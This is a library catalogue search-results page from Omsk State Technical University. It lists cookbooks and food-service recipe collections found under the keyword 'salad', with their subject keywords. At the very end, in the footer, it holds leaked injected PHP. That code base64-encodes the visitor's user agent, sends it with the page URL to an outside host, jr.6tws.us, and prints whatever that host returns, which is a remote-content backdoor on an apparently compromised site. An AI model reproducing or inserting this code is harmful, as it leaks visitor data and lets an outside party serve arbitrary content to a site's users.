Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

52 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Салат")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 68
21. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
22. 
Сборник рецептур таджикских национальных блюд и кулинарных изделий [Текст] / ред. А. Г. Газибеков, 1986. - 221 с.
Держатели документа (Информация об экземплярах) 
23. 
Современная молочная кухня [Текст] / М. Теплы [и др.], 1987. - 240 с.
Держатели документа (Информация об экземплярах) 
24. 
Русский гриль [Текст], 1995. - 143 с.
Держатели документа (Информация об экземплярах) 
25. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
26. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

27. 
Большая книга о раздельном питании [Текст] / пер. О. Анциферов, 1997. - 127 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
28. 
Могильный, Михаил Петрович. Справочник работника общественного питания [Текст] / М. П. Могильный, Т. В. Шленская, А. М. Могильный ; ред. М. П. Могильный, 2011. - 655 с.
Держатели документа (Информация об экземплярах) 
29. 
Кухни народов мира [Текст] / сост. М. В. Набережная, 2005. - 671 с.
Держатели документа (Информация об экземплярах) 
30. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
31. 
Татарская Л. Л. Кулинария и организация производства детского питания [Текст] / Л. Л. Татарская, Н. Г. Бутейкис, 1981. - 336 с.
Ключевые слова 
ПИТАНИЕ ДЕТЕЙ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- БУЛЬОН -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- СУП ХОЛОДНЫЙ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- КАША -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- ТЕСТО -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ВИНЕГРЕТ -- БУТЕРБРОД -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- КОМПОТ -- ВСКАРМЛИВАНИЕ ЕСТЕСТВЕННОЕ -- ВСКАРМЛИВАНИЕ ИСКУССТВЕННОЕ -- ВСКАРМЛИВАНИЕ СМЕШАННОЕ -- ПИТАНИЕ ДЕТЕЙ ГРУДНЫХ -- ПИТАНИЕ ЛЕЧЕБНОЕ ДЕТСКОЕ -- ПИЩЕБЛОК ДЕТСКОГО ПИТАНИЯ -- БРАКЕРАЖ -- МЕНЮ
Держатели документа (Информация об экземплярах) 
32. 
Кулинарные зарисовки о здоровом питании [Текст] : сборник / авт.-сост.: Г. В. Иванова, Л. Г. Макарова, И. Н. Пушмина и др., 2007. - 567 с.
Держатели документа (Информация об экземплярах) 
33. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2003. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
34. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2006. - 191 с.
Держатели документа (Информация об экземплярах) 
35. 
Гилберт, Элизабет. Кулинарная книга моей прабабушки [Текст] / Э. Гилберт, М. Я. Поттер ; пер. Ю. Змеева, 2014. - 332, [3] с.
Держатели документа (Информация об экземплярах) 
36. 
Русская кулинария [Текст] / сост. Е. Перлова, 1997. - 130 с.
Держатели документа (Информация об экземплярах) 
37. 
Уусивирта Х. А. П. Финская национальная кухня [Текст] / А. П. Уусивирта Х. ; авт. предисл. В. В. Похлёбкин, 1982. - 73 с.
Держатели документа (Информация об экземплярах) 
38. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
39. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
40. 
Хворостухина С. А. Секреты японской кухни [Текст] : закуски, соусы, супы, десерты, напитки / С. А. Хворостухина, 2004. - 239 с., [8] л. ил. с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2875 - 24.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.06 с.12 запросов, 0.59c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;